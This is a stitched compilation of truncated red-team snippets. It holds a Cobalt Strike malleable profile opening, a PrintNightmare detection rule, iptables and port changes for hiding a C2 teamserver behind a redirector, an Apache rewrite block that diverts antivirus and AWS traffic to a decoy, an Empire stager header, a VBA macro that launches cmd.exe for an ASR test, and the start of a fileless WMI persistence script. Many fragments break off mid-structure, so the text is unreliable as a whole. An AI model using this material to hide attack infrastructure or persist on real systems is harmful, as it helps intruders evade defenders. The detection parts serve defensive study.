#
# PlugX Profile
# Author: @infosecn1nja
#
# https://github.com/silence-is-best/c2db/blob/master/README.md
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
stage {
<!--
- PrinterNightmare CVE-2021-34527 Exploit Detection
- Created by Rahmat Nurfauzi (@infosecn1nja).
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
-->
<group name="sysmon,">
<rule id="99948" level="15">
<if_group>sysmon_event_11</if_group>
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>
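The rule above fires on a Sysmon FileCreate (event 11) where the spooler process itself writes unidrv.dll into a New\ staging directory, the file-drop shape of a CVE-2021-34527 driver install. The Python below is an added example, not part of the gist, that re-implements the rule's field tests and runs them over a handful of constructed Sysmon events. The event layout (win.system.eventID, win.eventdata.Image, win.eventdata.TargetFilename) is assumed from the field names the rule references; the sample events are made up and are not real telemetry.

```python
import json
import re

# Python re-implementation of the rule's two <field> tests. The Wazuh patterns
# "\\\\spoolsv.exe$" and "\\\\New\\\\unidrv.dll$" are written against the
# JSON-escaped path, so their backslashes are doubled twice; the paths below
# are already decoded, so one escaped backslash per separator is enough, and
# the dots are escaped so "unidrv.dll" cannot match "unidrvXdll".
IMAGE_RE = re.compile(r"\\spoolsv\.exe$", re.IGNORECASE)
TARGET_RE = re.compile(r"\\New\\unidrv\.dll$", re.IGNORECASE)

# Constructed sample events (not real telemetry). The layout is an assumption
# about what Wazuh's eventchannel decoder emits for Sysmon: win.system.eventID
# carries the Sysmon event ID, win.eventdata.* carries the Sysmon fields.
SAMPLE_EVENTS = [
    # benign driver install: the spooler writes the dll, but not into New\
    json.dumps({"win": {"system": {"eventID": "11"}, "eventdata": {
        "Image": "C:\\Windows\\System32\\spoolsv.exe",
        "TargetFilename": "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\unidrv.dll"}}}),
    # exploit-shaped drop: spoolsv.exe creating ...\New\unidrv.dll
    json.dumps({"win": {"system": {"eventID": "11"}, "eventdata": {
        "Image": "C:\\Windows\\System32\\spoolsv.exe",
        "TargetFilename": "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\unidrv.dll"}}}),
    # same file name written by a non-spooler process: no hit
    json.dumps({"win": {"system": {"eventID": "11"}, "eventdata": {
        "Image": "C:\\Users\\alice\\Downloads\\setup.exe",
        "TargetFilename": "C:\\Temp\\New\\unidrv.dll"}}}),
    # process creation (event 1) with a matching Image: wrong event type, no hit
    json.dumps({"win": {"system": {"eventID": "1"}, "eventdata": {
        "Image": "C:\\Windows\\System32\\spoolsv.exe",
        "CommandLine": "C:\\Windows\\System32\\spoolsv.exe"}}}),
]


def match_printnightmare(event: dict) -> bool:
    """True when the event satisfies every condition of rule 99948."""
    win = event.get("win", {})
    # <if_group>sysmon_event_11</if_group>: only FileCreate events are considered
    if win.get("system", {}).get("eventID") != "11":
        return False
    data = win.get("eventdata", {})
    return bool(IMAGE_RE.search(data.get("Image", ""))
                and TARGET_RE.search(data.get("TargetFilename", "")))


def scan(lines):
    """Return the TargetFilename of every alerting event among JSON log lines."""
    hits = []
    for line in lines:
        event = json.loads(line)
        if match_printnightmare(event):
            hits.append(event["win"]["eventdata"]["TargetFilename"])
    return hits


if __name__ == "__main__":
    for path in scan(SAMPLE_EVENTS):
        print("ALERT level 15: spoolsv.exe dropped", path)
```

Only the second event alerts: the first has the right process but a normal driver path, the third has the right file name from the wrong process, and the fourth is a process-creation event that the if_group filter excludes before the field tests are reached.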
#!/usr/bin/python
import argparse
import re, random
import string, os, os.path

def rand_num(min, max):
    # random integer in [min, max)
    return random.randrange(min, max)

def gen_str(size):
    # random ASCII-letter string of the given length, from the OS CSPRNG
    return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
Make rules that allow port 80/443 access only from the redirector (the per-source ACCEPT must sit before the catch-all DROP, since iptables stops at the first matching rule):
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change the default teamserver port:
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
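The four rules above only work because of first-match evaluation: each ACCEPT for the redirector is appended ahead of the DROP for everybody else, and nothing in them touches the teamserver port, so 50050 (or whatever the sed line renames it to) stays governed by the chain's default policy. The Python below is an added example, not from the gist, that parses the commands into an INPUT chain and evaluates packets against it, so the effect of rule order, of -A versus -I, and of the chain policy can be checked before touching a live host. The redirector and client addresses are TEST-NET values chosen for the example; only -A/-I INPUT, -p, -s, --dport and -j are modelled.

```python
import ipaddress
import shlex
from dataclasses import dataclass
from typing import Optional

# Constructed inputs: TEST-NET addresses stand in for the real hosts.
REDIRECTOR_IP = "203.0.113.10"
RULES_FROM_PAGE = [
    f"iptables -A INPUT -p tcp -s {REDIRECTOR_IP} --dport 443 -j ACCEPT",
    "iptables -A INPUT -p tcp --dport 443 -j DROP",
    f"iptables -A INPUT -p tcp -s {REDIRECTOR_IP} --dport 80 -j ACCEPT",
    "iptables -A INPUT -p tcp --dport 80 -j DROP",
]


@dataclass(frozen=True)
class Rule:
    target: str                              # ACCEPT or DROP
    dport: Optional[int]                     # None = any destination port
    src: Optional[ipaddress.IPv4Network]     # None = any source address


def parse_rules(commands):
    """Build the INPUT chain in the order the kernel would hold it.

    -A appends to the end of the chain; -I without an index inserts at the
    head. That placement, not the order the commands were typed, decides
    which rule matches first.
    """
    chain = []
    for cmd in commands:
        argv = shlex.split(cmd)
        if not argv or argv[0] != "iptables":
            raise ValueError(f"not an iptables command: {cmd}")
        mode, src, dport, target = None, None, None, None
        i = 1
        while i < len(argv):
            tok = argv[i]
            if tok in ("-A", "-I"):
                mode = tok
                if argv[i + 1] != "INPUT":
                    raise ValueError("only the INPUT chain is modelled here")
                i += 2
            elif tok == "-s":
                src = ipaddress.ip_network(argv[i + 1], strict=False)
                i += 2
            elif tok == "--dport":
                dport = int(argv[i + 1])
                i += 2
            elif tok == "-j":
                target = argv[i + 1]
                i += 2
            elif tok == "-p":
                i += 2          # the page only uses tcp; protocol is not modelled
            else:
                raise ValueError(f"unsupported option {tok!r} in: {cmd}")
        if mode is None or target is None:
            raise ValueError(f"incomplete rule: {cmd}")
        rule = Rule(target, dport, src)
        if mode == "-I":
            chain.insert(0, rule)
        else:
            chain.append(rule)
    return chain


def verdict(chain, src_ip, dport, policy="ACCEPT"):
    """First matching rule wins; an unmatched packet gets the chain policy."""
    addr = ipaddress.ip_address(src_ip)
    for rule in chain:
        if rule.dport is not None and rule.dport != dport:
            continue
        if rule.src is not None and addr not in rule.src:
            continue
        return rule.target
    return policy


if __name__ == "__main__":
    chain = parse_rules(RULES_FROM_PAGE)
    for ip, port in [(REDIRECTOR_IP, 443), ("198.51.100.7", 443), ("198.51.100.7", 50050)]:
        print(f"{ip}:{port} -> {verdict(chain, ip, port)}")
```

Two things the evaluator makes visible: appending the DROP before the ACCEPT turns the redirector away, and a packet to 50050 never matches any of the page's rules, so the teamserver port is only closed if the INPUT policy is DROP or a separate rule restricts it to the operator's address.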
APT Group/Red Team Weaponization Phase
=======================================
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
' ASR rule test: Office application creating a child process (should be blocked when the rule is enabled)
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{
    public TestClass()
    {}
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. CloudFronted requests by default will have a UA of "Amazon CloudFront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
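Each -R condition tests REMOTE_ADDR against a subnet, and [OR] chains them so that any single match is enough to send the request down the burn path. The Python below is an added example, not part of the gist, that applies the same decision to constructed Apache combined-format access-log lines: the two /8 ranges are taken from the rules above (whether they still describe AWS space is something to confirm against AWS's published ip-ranges.json rather than assume), and the "Amazon CloudFront" User-Agent check covers the CDN case the comment describes, where the connecting address is CloudFront's rather than the client's. The log lines use TEST-NET and documentation-style values and are not real traffic.

```python
import ipaddress
import re

# Subnets from the page's two "-R" RewriteCond lines.
EXCLUDED_NETS = [ipaddress.ip_network(n) for n in ("54.0.0.0/8", "52.0.0.0/8")]
# UA of requests arriving via CloudFront, per the page's comment.
EXCLUDED_UA = re.compile(r"Amazon CloudFront", re.IGNORECASE)

# Apache combined log format: client address first, User-Agent as the last quoted field.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed log lines (not real traffic).
SAMPLE_LOG = [
    '54.239.1.1 - - [10/Jul/2021:10:00:00 +0000] "GET /updates HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jul/2021:10:00:01 +0000] "GET /updates HTTP/1.1" 200 512 "-" "Amazon CloudFront"',
    '203.0.113.44 - - [10/Jul/2021:10:00:02 +0000] "GET /updates HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]


def should_burn(remote_addr: str, user_agent: str) -> bool:
    """Mirror of a RewriteCond group joined with [OR]: any true condition is enough.

    True means the request goes to the decoy page instead of being proxied
    to the team server.
    """
    addr = ipaddress.ip_address(remote_addr)
    if any(addr in net for net in EXCLUDED_NETS):      # the -R subnet tests
        return True
    return bool(EXCLUDED_UA.search(user_agent))          # the CloudFront UA test


def route(log_lines):
    """Return (ip, decision) per line, decision being 'decoy' or 'c2'."""
    decisions = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if not m:
            raise ValueError(f"unparsed log line: {line}")
        decisions.append((m["ip"], "decoy" if should_burn(m["ip"], m["ua"]) else "c2"))
    return decisions


if __name__ == "__main__":
    for ip, decision in route(SAMPLE_LOG):
        print(f"{ip:15} -> {decision}")
```

The first line is burned on address alone, the second on User-Agent even though its address is outside the excluded ranges, and only the third reaches the C2. Replaying a day's access log through route() before changing the rewrite rules is a cheap way to see how much real traffic a new exclusion would also swallow.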
from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'wmic_xsl_starfighters',

            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"